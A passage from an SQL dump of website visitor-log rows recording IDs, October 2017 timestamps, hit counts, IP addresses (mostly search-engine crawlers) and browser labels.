2.170','other'),(163439,1507051690,1,1,0,0,'178.154.171.88','other'),(163440,1507052121,1,1,0,0,'66.249.64.8','chrome'),(163441,1507052708,1,1,0,0,'217.182.132.172','other'),(163442,1507052760,1,1,0,0,'51.255.65.7','other'),(163443,1507052973,1,1,0,0,'51.255.65.54','other'),(163444,1507053020,1,1,0,0,'51.255.65.17','other'),(163445,1507053262,1,1,0,0,'137.74.207.159','other'),(163446,1507054240,1,1,0,0,'92.112.104.170','chrome'),(163447,1507055079,1,1,0,0,'91.209.11.236','other'),(163448,1507055304,1,1,0,0,'141.8.132.19','other'),(163449,1507055682,1,1,0,0,'141.8.142.74','other'),(163450,1507056247,1,1,0,0,'178.154.171.88','other'),(163451,1507056345,1,1,0,0,'91.209.11.236','other'),(163452,1507056543,2,2,0,0,'66.249.70.27','chrome'),(163453,1507056714,1,1,0,0,'87.250.224.46','other'),(163454,1507056774,1,1,0,0,'51.255.65.69','other'),(163455,1507057200,1,1,0,0,'51.255.65.30','other'),(163456,1507057224,1,1,0,0,'51.255.65.20','other'),(163457,1507057322,1,1,0,0,'91.209.11.236','other'),(163458,1507058021,1,1,0,0,'51.255.65.13','other'),(163459,1507058658,2,2,0,0,'136.243.73.76','other'),(163460,1507059836,2,2,0,0,'141.8.142.74','other'),(163461,1507060075,1,1,0,0,'8.29.198.25','other'),(163462,1507060255,1,1,0,0,'91.209.11.236','other'),(163463,1507061048,1,1,0,0,'37.9.113.74','other'),(163464,1507061993,1,1,0,0,'217.182.132.150','other'),(163465,1507062250,1,1,0,0,'51.255.65.49','other'),(163466,1507063198,1,1,0,0,'217.182.132.73','other'),(163467,1507063473,1,1,0,0,'87.250.224.125','other'),(163468,1507063537,1,1,0,0,'51.255.65.34','other'),(163469,1507063868,1,1,0,0,'87.250.224.77','other'),(163470,1507063943,1,1,0,0,'141.8.142.29','other'),(163471,1507064301,1,1,0,0,'91.209.11.236','other'),(163472,1507064458,1,0,1,0,'66.249.70.25',''),(163473,1507064685,1,1,0,0,'217.182.132.97','other'),(163474,1507065237,1,1,0,0,'51.255.65.91','other'),(163475,1507065578,1,1,0,0,'51.255.71.123','other'),(163476,1507065804,1,1,0,0,'5.45.207.83','other'),(163477,1507065878,1,1,0,0,'178.154.171.55','other'),(163478,1507066049,1,1,0,0,'217.182.132.21','other'),(163479,1507066087,1,1,0,0,'51.255.65.44','other'),(163480,1507066318,1,1,0,0,'217.182.132.29','other'),(163481,1507066441,1,1,0,0,'137.74.207.114','other'),(163482,1507066586,1,1,0,0,'217.69.133.2','other'),(163483,1507066644,1,1,0,0,'178.154.171.88','other'),(163484,1507066648,1,1,0,0,'37.9.113.100','other'),(163485,1507067346,1,1,0,0,'34.248.69.158','other'),(163486,1507067905,1,1,0,0,'180.76.15.160','other'),(163487,1507068029,1,0,1,0,'66.249.64.6',''),(163488,1507068664,2,2,0,0,'5.45.207.82','other'),(163489,1507068670,1,1,0,0,'178.154.200.32','other'),(163490,1507068877,1,1,0,0,'216.244.66.237','other'),(163491,1507068898,68,68,0,0,'34.248.69.158','other'),(163492,1507068923,1,1,0,0,'217.182.132.72','other'),(163493,1507069229,1,1,0,0,'95.108.213.24','other'),(163494,1507069613,1,1,0,0,'37.9.113.151','other'),(163495,1507069775,1,1,0,0,'137.74.207.102','other'),(163496,1507069820,1,1,0,0,'66.249.64.29','chrome'),(163497,1507069917,1,1,0,0,'217.182.132.74','other'),(163498,1507069986,1,1,0,0,'37.9.113.110','other'),(163499,1507070030,1,1,0,0,'51.255.65.59','other'),(163500,1507070273,1,0,1,0,'66.249.64.30',''),(163501,1507070289,1,0,1,0,'68.180.230.153',''),(163502,1507070415,58,58,0,0,'34.248.69.158','other'),(163503,1507070494,1,1,0,0,'91.209.11.236','other'),(163504,1507070917,1,1,0,0,'8.29.198.27','other'),(163505,1507070960,1,1,0,0,'217.182.132.155','other'),(163506,1507071052,1,1,0,0,'217.69.133.5','other'),(163507,1507071283,1,1,0,0,'216.244.66.237','other'),(163508,1507071298,1,1,0,0,'178.154.200.28','other'),(163509,1507071441,1,1,0,0,'51.255.65.35','other'),(163510,1507071586,1,1,0,0,'51.255.65.85','other'),(163511,1507071724,1,1,0,0,'137.74.201.108','other'),(163512,1507071869,2,2,0,0,'217.182.132.74','other'),(163513,1507072288,1,1,0,0,'95.108.213.24','other'),(163514,1507072316,1,0,1,0,'68.180.230.153',''),(163515,1507073988,1,1,0,0,'157.55.39.89','other'),(163516,1507074010,1,1,0,0,'217.182.132.36','other'),(163517,1507074016,1,1,0,0,'217.69.133.3','other'),(163518,1507074368,1,1,0,0,'40.77.167.135','other'),(163519,1507075338,1,1,0,0,'217.182.132.81','other'),(163520,1507075451,1,0,1,0,'66.249.64.30',''),(163521,1507076292,1,1,0,0,'141.8.142.50','other'),(163522,1507076677,1,1,0,0,'217.69.133.9','other'),(163523,1507076700,1,1,0,0,'51.255.65.52','other'),(163524,1507076789,2,2,0,0,'91.209.11.236','other'),(163525,1507076812,1,1,0,0,'137.74.207.159','other'),(163526,1507077727,1,1,0,0,'217.182.132.147','other'),(163527,1507077818,1,1,0,0,'91.196.178.68','chrome'),(163528,1507078385,1,1,0,0,'141.8.142.74','other'),(163529,1507079565,1,1,0,0,'141.8.142.74','other'),(163530,1507080476,1,1,0,0,'178.154.171.88','other'),(163531,1507080615,1,1,0,0,'51.255.65.46','other'),(163532,1507081350,1,0,1,0,'66.249.64.29',''),(163533,1507081613,2,2,0,0,'141.8.142.74','other'),(163534,1507081734,1,1,0,0,'178.154.171.88','other'),(163535,1507081750,1,1,0,0,'87.250.224.46','other'),(163536,1507081758,1,1,0,0,'8.29.198.26','other'),(163537,1507082299,1,1,0,0,'51.255.65.79','other'),(163538,1507082550,1,1,0,0,'66.249.64.28','chrome'),(163539,1507082639,1,1,0,0,'217.182.132.25','other'),(163540,1507082732,1,1,0,0,'137.74.207.110','other'),(163541,1507082823,1,1,0,0,'137.74.207.188','other'),(163542,1507083261,1,1,0,0,'207.46.13.133','other'),(163543,1507083525,1,1,0,0,'5.9.88.103','other'),(163544,1507083809,1,1,0,0,'51.255.65.72','other'),(163545,1507084113,1,1,0,0,'37.9.113.60','other'),(163546,1507084158,1,1,0,0,'66.249.70.29','chrome'),(163547,1507084164,1,1,0,0,'178.154.171.10','other'),(163548,1507084181,1,0,1,0,'66.249.70.25',''),(163549,1507084588,1,1,0,0,'141.8.142.126','other'),(163550,1507084788,1,1,0,0,'51.255.71.133','other'),(163551,1507084962,1,1,0,0,'217.182.132.69','other'),(163552,1507085284,1,1,0,0,'51.255.65.96','other'),(163553,1507085801,1,1,0,0,'141.8.142.74','other'),(163554,1507086257,1,1,0,0,'217.182.132.31','other'),(163555,1507086287,1,1,0,0,'217.182.132.150','other'),(163556,1507086782,1,1,0,0,'217.182.132.177','other'),(163557,1507087165,1,1,0,0,'178.154.171.10','other'),(163558,1507087758,1,1,0,0,'217.182.132.62','other'),(163559,1507090060,1,1,0,0,'40.77.167.13','other'),(163560,1507090762,1,0,1,0,'66.249.70.29',''),(163561,1507091084,1,0,1,0,'68.180.230.153',''),(163562,1507091136,1,1,0,0,'217.69.133.194','other'),(163563,1507091161,1,1,0,0,'51.255.65.79','other'),(163564,1507091423,1,1,0,0,'217.182.132.184','other'),(163565,1507091509,1,1,0,0,'217.182.132.17','other'),(163566,1507091528,1,1,0,0,'217.69.133.4','other'),(163567,1507091611,1,1,0,0,'216.244.66.237','other'),(163568,1507092130,1,1,0,0,'164.132.162.158','other'),(163569,1507092592,1,1,0,0,'8.29.198.25','other'),(163570,1507092695,1,0,1,0,'66.249.70.27',''),(163571,1507092794,1,1,0,0,'91.196.177.46','firefox'),(163572,1507093671,1,1,0,0,'91.196.179.33','firefox'),(163573,1507093845,1,1,0,0,'217.182.132.64','other'),(163574,1507094647,1,1,0,0,'91.196.178.65','chrome'),(163575,1507094781,1,1,0,0,'91.196.178.71','chrome'),(163576,1507094965,1,0,1,0,'66.249.64.29',''),(163577,1507095639,1,1,0,0,'37.9.113.63','other'),(163578,1507095819,1,1,0,0,'137.74.207.116','other'),(163579,1507096632,1,1,0,0,'164.132.162.187','other'),(163580,1507097033,1,1,0,0,'91.209.11.236','other'),(163581,1507097032,1,1,0,0,'217.69.133.194','other'),(163582,1507097066,1,1,0,0,'51.255.65.84','other'),(163583,1507097153,1,1,0,0,'123.126.113.156','other'),(163584,1507097462,1,0,1,0,'66.249.64.29',''),(163585,1507097632,3,3,0,0,'91.196.178.65','chrome'),(163586,1507097697,1,1,0,0,'51.255.65.80','other'),(163587,1507098171,1,1,0,0,'51.255.65.55','other'),(163588,1507098180,1,1,0,0,'217.182.132.15','other'),(163589,1507098239,1,0,1,0,'66.249.70.29',''),(163590,1507098466,1,1,0,0,'213.108.45.138','chrome'),(163591,1507098839,1,1,0,0,'178.154.171.88','other'),(163592,1507098900,1,1,0,0,'216.244.66.237','other'),(163593,1507098925,1,1,0,0,'188.166.72.23','chrome'),(163594,1507099115,1,1,0,0,'91.196.178.65','chrome'),(163595,1507099309,1,1,0,0,'66.249.70.25','chrome'),(163596,1507099857,1,1,0,0,'217.69.133.203','other'),(163597,1507100290,1,1,0,0,'51.255.65.17','other'),(163598,1507100450,1,1,0,0,'91.196.178.65','chrome'),(163599,1507101057,1,1,0,0,'180.76.15.144','other'),(163600,1507101270,1,0,1,0,'68.180.230.153',''),(163601,1507101602,1,1,0,0,'92.113.21.38','chrome'),(163602,1507101810,1,1,0,0,'217.182.132.84','other'),(163603,1507102087,1,1,0,0,'51.255.71.131','other'),(163604,1507102200,1,1,0,0,'51.255.65.12','other'),(163605,1507102360,1,1,0,0,'91.196.178.72','firefox'),(163606,1507102914,1,1,0,0,'217.69.133.203','other'),(163607,1507103034,1,1,0,0,'217.182.132.37','other'),(163608,1507103091,1,1,0,0,'51.255.65.64','other'),(163609,1507103429,1,1,0,0,'8.29.198.26','other'),(163610,1507103470,1,1,0,0,'178.62.234.153','chrome'),(163611,1507103943,1,1,0,0,'91.196.178.65','chrome'),(163612,1507104538,1,1,0,0,'217.182.132.29','other'),(163613,1507104558,1,1,0,0,'216.244.66.237','other'),(163614,1507104985,1,1,0,0,'217.182.132.7','other'),(163615,1507105045,1,1,0,0,'51.255.65.83','other'),(163616,1507105050,1,1,0,0,'40.77.167.13','other'),(163617,1507105484,1,1,0,0,'51.255.65.25','other'),(163618,1507105693,1,1,0,0,'217.69.133.3','other'),(163619,1507105995,1,1,0,0,'51.255.65.85','other'),(163620,1507106015,1,1,0,0,'141.8.142.74','other'),(163621,1507106048,1,1,0,0,'137.74.207.114','other'),(163622,1507106371,1,1,0,0,'46.161.9.55','other'),(163623,1507106394,1,1,0,0,'217.182.132.155','other'),(163624,1507106609,1,0,1,0,'68.180.229.52',''),(163625,1507106698,1,1,0,0,'51.255.65.11','other'),(163626,1507106905,1,1,0,0,'216.244.66.237','other'),(163627,1507107250,1,1,0,0,'91.196.178.65','chrome'),(163628,1507107811,1,1,0,0,'51.255.65.32','other'),(163629,1507107963,1,1,0,0,'178.154.171.88','other'),(163630,1507108108,1,1,0,0,'217.182.132.60','other'),(163631,1507108135,1,1,0,0,'37.9.113.60','other'),(163632,1507108233,1,1,0,0,'91.196.178.65','chrome'),(163633,1507108256,1,1,0,0,'5.45.207.49','other'),(163634,1507109038,1,1,0,0,'51.255.65.83','other'),(163635,1507109061,1,1,0,0,'40.77.167.135','other'),(163636,1507109262,1,1,0,0,'217.182.132.149','other'),(163637,1507109633,1,1,0,0,'178.154.171.88','other'),(163638,1507110041,1,1,0,0,'217.182.132.31','other'),(163639,1507110321,2,2,0,0,'46.133.169.194','chrome'),(163640,1507110379,1,1,0,0,'81.1.242.33','other'),(163641,1507110636,2,2,0,0,'91.196.177.15','chrome'),(163642,1507110776,1,1,0,0,'51.255.71.110','other'),(163643,1507110942,1,1,0,0,'95.135.91.200','firefox'),(163644,1507111032,1,1,0,0,'91.196.178.70','chrome'),(163645,1507111036,1,1,0,0,'217.182.132.33','other'),(163646,1507111382,1,1,0,0,'178.154.171.88','other'),(163647,1507111515,1,1,0,0,'46.133.169.194','chrome'),(163648,1507111660,1,1,0,0,'91.209.11.236','other'),(163649,1507111662,1,1,0,0,'31.41.71.100','chrome'),(163650,1507112182,1,1,0,0,'137.74.201.100','other'),(163651,1507112697,1,1,0,0,'217.182.132.191','other'),(163652,1507112720,1,1,0,0,'217.69.133.2','other'),(163653,1507112926,1,1,0,0,'162.210.196.130','other'),(163654,1507113976,1,1,0,0,'51.255.65.30','other'),(163655,1507114164,1,0,1,0,'66.249.64.28',''),(163656,1507114255,1,1,0,0,'8.29.198.26','other'),(163657,1507114306,1,1,0,0,'51.255.65.54','other'),(163658,1507114656,1,1,0,0,'66.249.64.30','chrome'),(163659,1507114666,1,1,0,0,'66.249.70.25','chrome'),(163660,1507114670,1,0,1,0,'66.249.70.27',''),(163661,1507115225,1,1,0,0,'178.154.171.24','other'),(163662,1507115402,1,1,0,0,'46.133.192.172','chrome'),(163663,1507115938,1,1,0,0,'207.46.13.133','other'),(163664,1507116023,1,1,0,0,'164.132.164.180','other'),(163665,1507116227,1,1,0,0,'217.182.132.94','other'),(163666,1507116527,2,2,0,0,'40.77.167.13','other'),(163667,1507116702,1,1,0,0,'46.133.105.80','chrome'),(163668,1507116728,2,2,0,0,'141.8.142.74','other'),(163669,1507116784,3,3,0,0,'178.154.171.88','other'),(163670,1507116814,1,1,0,0,'92.113.20.188','chrome'),(163671,1507118118,1,1,0,0,'217.182.132.148','other'),(163672,1507118261,1,1,0,0,'91.196.178.69','chrome'),(163673,1507118478,1,1,0,0,'91.196.178.163','chrome'),(163674,1507118683,1,1,0,0,'141.8.142.74','other'),(163675,1507118790,1,1,0,0,'207.46.13.133','other'),(163676,1507119267,1,1,0,0,'91.196.178.69','chrome'),(163677,1507119299,1,1,0,0,'91.196.178.65','firefox'),(163678,1507119337,1,1,0,0,'51.255.65.35','other'),(163679,1507119514,1,1,0,0,'157.55.39.89','other'),(163680,1507120292,1,1,0,0,'137.74.207.116','other'),(163681,1507120404,1,1,0,0,'107.167.109.20','opera'),(163682,1507120741,1,1,0,0,'141.8.142.74','other'),(163683,1507120771,1,1,0,0,'51.255.65.49','other'),(163684,1507121149,1,1,0,0,'91.196.177.46','firefox'),(163685,1507121296,1,1,0,0,'91.196.177.46','chrome'),(163686,1507121897,1,1,0,0,'107.167.109.20','opera'),(163687,1507122070,1,1,0,0,'217.182.132.172','other'),(163688,1507122522,1,1,0,0,'217.182.132.176','other'),(163689,1507122820,1,1,0,0,'66.102.9.29','chrome'),(163690,1507123379,1,1,0,0,'91.196.178.65','chrome'),(163691,1507124074,1,1,0,0,'217.69.133.5','other'),(163692,1507124146,1,1,0,0,'216.244.66.237','other'),(163693,1507124187,1,1,0,0,'5.45.207.82','other'),(163694,1507124307,3,3,0,0,'91.196.178.65','chrome'),(163695,1507124462,3,1,2,0,'66.249.64.30',''),(163696,1507124533,1,1,0,0,'91.196.178.65','firefox'),(163697,1507124624,1,0,1,0,'66.249.64.29',''),(163698,1507124628,1,0,1,0,'66.249.64.28',''),(163699,1507124827,115,115,0,0,'52.210.234.45','other'),(163700,1507125087,1,1,0,0,'8.29.198.27','other'),(163701,1507125186,1,1,0,0,'91.209.11.236','other'),(163702,1507125243,2,2,0,0,'91.196.178.65','chrome'),(163703,1507125428,1,1,0,0,'164.132.162.153','other'),(163704,1507125849,1,1,0,0,'217.182.132.27','other'),(163705,1507125881,1,1,0,0,'51.255.65.70','other'),(163706,1507125954,1,1,0,0,'37.9.113.114','other'),(163707,1507125993,1,0,1,0,'66.249.70.27',''),(163708,1507126026,1,0,1,0,'66.249.64.28',''),(163709,1507126319,1,1,0,0,'91.196.178.70','chrome'),(163710,1507126500,1,1,0,0,'178.154.171.88','other'),(163711,1507126515,1,1,0,0,'217.182.132.67','other'),(163712,1507126583,1,1,0,0,'217.182.132.183','other'),(163713,1507126666,1,1,0,0,'164.132.162.153','other'),(163714,1507126681,1,1,0,0,'164.132.162.154','other'),(163715,1507127050,1,1,0,0,'217.182.132.21','other'),(163716,1507127093,1,1,0,0,'5.45.207.49','other'),(163717,1507127511,1,1,0,0,'176.213.245.219','chrome'),(163718,1507127592,1,1,0,0,'66.249.64.29','chrome'),(163719,1507127941,1,1,0,0,'91.196.178.69','firefox'),(163720,1507128155,1,0,1,0,'66.249.70.29',''),(163721,1507128519,1,1,0,0,'51.255.65.71','other'),(163722,1507128571,1,1,0,0,'80.70.77.131','chrome'),(163723,1507128708,1,1,0,0,'51.255.65.34','other'),(163724,1507128765,1,1,0,0,'217.182.132.170','other'),(163725,1507129135,1,1,0,0,'51.255.65.62','other'),(163726,1507129749,1,1,0,0,'217.182.132.4','other'),(163727,1507129786,1,1,0,0,'217.69.133.9','other'),(163728,1507129863,1,1,0,0,'217.182.132.17','other'),(163729,1507130303,1,1,0,0,'51.255.71.115','other'),(163730,1507130508,1,1,0,0,'217.182.132.82','other'),(163731,1507130514,1,1,0,0,'51.255.65.21','other'),(163732,1507131465,1,1,0,0,'82.145.220.37','chrome'),(163733,1507131672,1,1,0,0,'164.132.162.187','other'),(163734,1507131981,1,1,0,0,'92.113.191.101','chrome'),(163735,1507132277,4,4,0,0,'69.197.139.130','firefox'),(163736,1507132278,6,6,0,0,'69.197.139.130','msie'),(163737,1507132401,1,1,0,0,'217.182.132.88','other'),(163738,1507132441,1,1,0,0,'217.182.132.67','other'),(163739,1507133704,1,1,0,0,'137.74.207.110','other'),(163740,1507133723,1,1,0,0,'217.182.132.154','other'),(163741,1507133757,1,0,1,0,'66.249.64.28',''),(163742,1507133761,1,1,0,0,'178.154.171.88','other'),(163743,1507134035,1,1,0,0,'217.182.132.150','other'),(163744,1507134447,1,1,0,0,'217.69.133.6','other'),(163745,1507135333,1,1,0,0,'217.182.132.174','other'),(163746,1507135761,1,1,0,0,'51.255.65.59','other'),(163747,1507135797,1,1,0,0,'87.250.224.46','other'),(163748,1507135918,1,1,0,0,'8.29.198.26','other'),(163749,1507136560,1,1,0,0,'92.113.191.101','chrome'),(163750,1507136804,1,1,0,0,'91.196.178.65','chrome'),(163751,1507137540,1,1,0,0,'188.255.91.175','msie'),(163752,1507137577,1,1,0,0,'216.244.66.237','other'),(163753,1507137917,1,1,0,0,'51.255.65.62','other'),(163754,1507138028,1,1,0,0,'137.74.207.170','other'),(163755,1507138241,1,1,0,0,'141.8.142.74','other'),(163756,1507138315,1,1,0,0,'51.255.65.68','other'),(163757,1507138534,1,1,0,0,'157.55.39.89','other'),(163758,1507138875,1,1,0,0,'51.255.65.80','other'),(163759,1507138983,1,1,0,0,'51.255.71.128','other'),(163760,1507139903,1,1,0,0,'37.9.113.157','other'),(163761,1507139907,1,1,0,0,'141.8.142.74','other'),(163762,1507140494,1,1,0,0,'217.182.132.23','other'),(163763,1507140926,1,1,0,0,'51.255.65.58','other'),(163764,1507141017,1,1,0,0,'217.182.132.91','other'),(163765,1507141171,1,1,0,0,'37.73.209.81','chrome'),(163766,1507141413,1,1,0,0,'217.69.133.194','other'),(163767,1507142199,1,1,0,0,'51.255.71.128','other'),(163768,1507142225,1,1,0,0,'51.255.65.33','other'),(163769,1507142556,1,1,0,0,'217.182.132.75','other'),(163770,1507142586,1,1,0,0,'51.255.64.106','other'),(163771,1507142705,1,1,0,0,'216.244.66.237','other'),(163772,1507142826,1,1,0,0,'217.182.132.193','other'),(163773,1507142932,1,1,0,0,'164.132.162.160','other'),(163774,1507143483,1,1,0,0,'178.154.171.88','other'),(163775,1507143871,1,1,0,0,'51.255.71.111','other'),(163776,1507143906,1,1,0,0,'54.165.59.7','other'),(163777,1507144251,1,1,0,0,'87.250.224.46','other'),(163778,1507144466,1,1,0,0,'164.132.162.154','other'),(163779,1507144584,1,1,0,0,'165.227.138.91','other'),(163780,1507145166,1,1,0,0,'216.244.66.237','other'),(163781,1507145330,1,0,1,0,'68.180.229.52',''),(163782,1507145381,1,1,0,0,'141.8.142.74','other'),(163783,1507146092,1,1,0,0,'217.182.132.147','other'),(163784,1507146221,1,1,0,0,'91.209.11.236','other'),(163785,1507146577,1,1,0,0,'217.182.132.88','other'),(163786,1507146747,1,1,0,0,'8.29.198.27','other'),(163787,1507147181,1,1,0,0,'141.8.142.74','other'),(163788,1507147284,1,1,0,0,'37.9.113.182','other'),(163789,1507147741,2,2,0,0,'216.244.66.237','other'),(163790,1507148194,1,1,0,0,'51.255.65.5','other'),(163791,1507148214,1,1,0,0,'37.9.113.115','other'),(163792,1507148457,1,1,0,0,'91.209.11.236','other'),(163793,1507148484,1,1,0,0,'87.250.224.46','other'),(163794,1507148522,1,1,0,0,'51.255.71.101','other'),(163795,1507148665,1,1,0,0,'46.133.111.195','chrome'),(163796,1507149034,2,2,0,0,'141.8.142.74','other'),(163797,1507149130,1,1,0,0,'141.8.132.19','other'),(163798,1507149643,1,1,0,0,'217.182.132.152','other'),(163799,1507151216,1,1,0,0,'51.255.65.71','other'),(163800,1507151251,1,1,0,0,'51.255.65.38','other'),(163801,1507151315,1,1,0,0,'141.8.132.22','other'),(163802,1507151344,2,2,0,0,'51.255.65.52','other'),(163803,1507151443,1,1,0,0,'217.69.133.6','other'),(163804,1507151645,1,1,0,0,'91.209.11.236','other'),(163805,1507151823,1,1,0,0,'141.8.142.74','other'),(163806,1507152850,1,1,0,0,'207.241.231.165','other'),(163807,1507152870,1,1,0,0,'51.255.65.10','other'),(163808,1507152892,1,1,0,0,'217.182.132.5','other'),(163809,1507152960,1,1,0,0,'217.69.133.203','other'),(163810,1507153106,1,1,0,0,'87.250.224.46','other'),(163811,1507153319,1,1,0,0,'51.255.65.71','other'),(163812,1507153406,1,0,1,0,'66.249.70.25',''),(163813,1507153414,1,1,0,0,'66.249.70.25','chrome'),(163814,1507153792,1,1,0,0,'207.241.229.236','other'),(163815,1507153994,1,1,0,0,'51.255.65.10','other'),(163816,1507154063,1,1,0,0,'178.154.171.4','other'),(163817,1507154371,1,1,0,0,'217.182.132.80','other'),(163818,1507154433,1,1,0,0,'51.255.71.114','other'),(163819,1507154443,1,1,0,0,'51.255.65.67','other'),(163820,1507154531,1,1,0,0,'164.132.115.93','other'),(163821,1507154658,1,1,0,0,'51.255.65.72','other'),(163822,1507155289,1,1,0,0,'66.249.64.29','chrome'),(163823,1507155354,1,1,0,0,'37.9.113.182','other'),(163824,1507155444,1,1,0,0,'180.76.15.162','other'),(163825,1507155626,1,1,0,0,'216.244.66.237','other'),(163826,1507156113,1,1,0,0,'51.255.65.74','other'),(163827,1507156545,1,1,0,0,'217.182.132.157','other'),(163828,1507156717,1,1,0,0,'141.8.142.74','other'),(163829,1507157061,1,1,0,0,'51.255.65.69','other'),(163830,1507157292,1,0,1,0,'66.249.70.27',''),(163831,1507157583,1,1,0,0,'8.29.198.25','other'),(163832,1507157725,1,1,0,0,'217.182.132.148','other'),(163833,1507157843,2,2,0,0,'136.243.73.76','other'),(163834,1507158177,1,1,0,0,'51.255.71.113','other'),(163835,1507158330,1,1,0,0,'217.182.132.37','other'),(163836,1507158700,1,1,0,0,'137.74.207.188','other'),(163837,1507159369,1,0,1,0,'66.249.64.29',''),(163838,1507160349,1,1,0,0,'51.255.65.34','other'),(163839,1507160413,1,1,0,0,'157.55.39.89','other'),(163840,1507160752,1,0,1,0,'66.249.64.28',''),(163841,1507160985,1,1,0,0,'217.182.132.24','other'),(163842,1507161017,1,1,0,0,'87.250.224.46','other'),(163843,1507161109,1,1,0,0,'137.74.207.108','other'),(163844,1507161299,1,1,0,0,'141.8.142.74','other'),(163845,1507161454,2,2,0,0,'207.46.13.133','other'),(163846,1507162761,1,1,0,0,'164.132.162.164','other'),(163847,1507163103,1,1,0,0,'51.255.65.30','other'),(163848,1507163494,1,1,0,0,'185.7.215.163','firefox'),(163849,1507163703,1,1,0,0,'217.182.132.56','other'),(163850,1507163719,1,1,0,0,'151.80.27.116','other'),(163851,1507163920,1,0,1,0,'66.249.70.29',''),(163852,1507163935,1,1,0,0,'66.249.70.27','chrome'),(163853,1507164004,1,1,0,0,'66.249.64.30','chrome'),(163854,1507164638,1,1,0,0,'141.8.142.74','other'),(163855,1507164795,1,1,0,0,'51.255.71.111','other'),(163856,1507165513,1,1,0,0,'51.255.71.113','other'),(163857,1507165689,1,1,0,0,'178.154.171.88','other'),(163858,1507166253,1,1,0,0,'217.69.133.194','other'),(163859,1507166516,1,1,0,0,'216.244.66.237','other'),(163860,1507166561,1,1,0,0,'217.182.132.66','other'),(163861,1507168414,1,1,0,0,'8.29.198.27','other'),(163862,1507168498,1,1,0,0,'51.255.71.132','other'),(163863,1507169021,1,1,0,0,'51.255.65.71','other'),(163864,1507169060,1,1,0,0,'40.77.167.13','other'),(163865,1507169270,1,1,0,0,'217.182.132.4','other'),(163866,1507169526,1,1,0,0,'217.182.132.65','other'),(163867,1507169530,1,1,0,0,'91.209.11.236','other'),(163868,1507169939,1,0,1,0,'66.249.64.30',''),(163869,1507169946,1,1,0,0,'164.132.162.188','other'),(163870,1507170420,1,1,0,0,'87.250.224.46','other'),(163871,1507170425,1,1,0,0,'217.182.132.53','other'),(163872,1507170476,1,1,0,0,'51.255.65.92','other'),(163873,1507171065,1,1,0,0,'51.255.71.101','other'),(163874,1507171088,1,1,0,0,'91.209.11.236','other'),(163875,1507171417,1,1,0,0,'137.74.207.114','other'),(163876,1507172868,1,1,0,0,'137.74.207.170','other'),(163877,1507172877,1,1,0,0,'51.255.65.70','other'),(163878,1507172915,1,1,0,0,'51.255.65.16','other'),(163879,1507173213,2,2,0,0,'80.241.214.123','other'),(163880,1507173418,1,1,0,0,'46.161.9.55','chrome'),(163881,1507173836,1,1,0,0,'217.182.132.154','other'),(163882,1507174524,1,1,0,0,'51.255.65.73','other'),(163883,1507175151,1,1,0,0,'217.182.132.60','other'),(163884,1507175402,1,1,0,0,'137.74.207.188','other'),(163885,1507175695,1,1,0,0,'217.69.133.203','other'),(163886,1507175925,1,1,0,0,'51.255.65.61','other'),(163887,1507176025,1,1,0,0,'137.74.207.109','other'),(163888,1507176113,1,1,0,0,'51.255.71.115','other'),(163889,1507176193,1,1,0,0,'51.255.71.132','other'),(163890,1507176452,1,1,0,0,'51.255.71.125','other'),(163891,1507178407,1,1,0,0,'91.196.177.46','firefox'),(163892,1507178550,1,1,0,0,'217.182.132.152','other'),(163893,1507178583,1,0,1,0,'66.249.70.27',''),(163894,1507178593,1,1,0,0,'66.249.70.27','chrome'),(163895,1507178598,1,1,0,0,'66.249.64.30','chrome'),(163896,1507178768,1,1,0,0,'51.255.65.48','other'),(163897,1507178916,1,1,0,0,'141.8.142.74','other'),(163898,1507179014,1,1,0,0,'51.255.71.112','other'),(163899,1507179174,1,1,0,0,'217.182.132.69','other'),(163900,1507179250,1,1,0,0,'8.29.198.26','other'),(163901,1507179863,1,1,0,0,'37.9.113.110','other'),(163902,1507180375,1,1,0,0,'217.182.132.21','other'),(163903,1507180480,1,1,0,0,'51.255.71.111','other'),(163904,1507180652,1,1,0,0,'51.255.65.59','other'),(163905,1507180784,1,1,0,0,'178.154.171.88','other'),(163906,1507180786,1,1,0,0,'137.74.201.108','other'),(163907,1507181067,1,1,0,0,'217.182.132.22','other'),(163908,1507181481,1,1,0,0,'91.196.178.65','chrome'),(163909,1507181546,1,1,0,0,'92.113.20.188','chrome'),(163910,1507181670,1,1,0,0,'217.69.133.4','other'),(163911,1507181714,1,1,0,0,'54.165.59.7','other'),(163912,1507182173,1,1,0,0,'178.154.171.88','other'),(163913,1507182353,1,1,0,0,'91.209.11.236','other'),(163914,1507182443,1,1,0,0,'107.167.109.20','opera'),(163915,1507182575,1,1,0,0,'91.196.178.65','chrome'),(163916,1507182611,1,1,0,0,'207.46.13.14','other'),(163917,1507182823,1,1,0,0,'217.182.132.36','other'),(163918,1507183416,1,1,0,0,'51.255.71.131','other'),(163919,1507183481,1,1,0,0,'51.255.65.42','other'),(163920,1507183678,1,1,0,0,'107.167.109.20','opera'),(163921,1507183995,1,0,1,0,'68.180.229.52',''),(163922,1507184100,1,1,0,0,'217.182.132.174','other'),(163923,1507184461,1,1,0,0,'51.255.65.95','other'),(163924,1507184592,1,1,0,0,'51.255.71.121','other'),(163925,1507184755,1,1,0,0,'178.154.171.88','other'),(163926,1507185355,1,1,0,0,'164.132.162.188','other'),(163927,1507185504,1,1,0,0,'51.255.65.20','other'),(163928,1507185599,1,1,0,0,'217.182.132.185','other'),(163929,1507185744,2,2,0,0,'141.8.142.74','other'),(163930,1507185927,1,1,0,0,'178.154.171.88','other'),(163931,1507186164,1,1,0,0,'217.69.133.2','other'),(163932,1507186178,1,1,0,0,'91.196.178.65','chrome'),(163933,1507186371,1,1,0,0,'51.255.65.87','other'),(163934,1507186448,1,1,0,0,'91.196.178.68','chrome'),(163935,1507187212,1,1,0,0,'91.196.178.65','chrome'),(163936,1507187743,1,1,0,0,'51.255.71.101','other'),(163937,1507187844,1,1,0,0,'51.255.71.111','other'),(163938,1507187873,1,1,0,0,'178.154.171.88','other'),(163939,1507187888,1,1,0,0,'137.74.207.101','other'),(163940,1507187941,1,1,0,0,'217.182.132.35','other'),(163941,1507188138,1,1,0,0,'164.132.162.159','other'),(163942,1507188371,2,2,0,0,'91.196.178.67','chrome'),(163943,1507188526,1,1,0,0,'213.174.29.80','chrome'),(163944,1507188688,1,1,0,0,'51.255.65.26','other'),(163945,1507189045,2,2,0,0,'141.8.142.74','other'),(163946,1507189277,1,1,0,0,'51.255.65.41','other'),(163947,1507189345,1,1,0,0,'91.196.178.67','chrome'),(163948,1507189602,1,1,0,0,'87.250.224.46','other'),(163949,1507189733,1,0,1,0,'66.249.70.25',''),(163950,1507189746,1,1,0,0,'66.249.70.29','chrome'),(163951,1507189758,1,1,0,0,'66.249.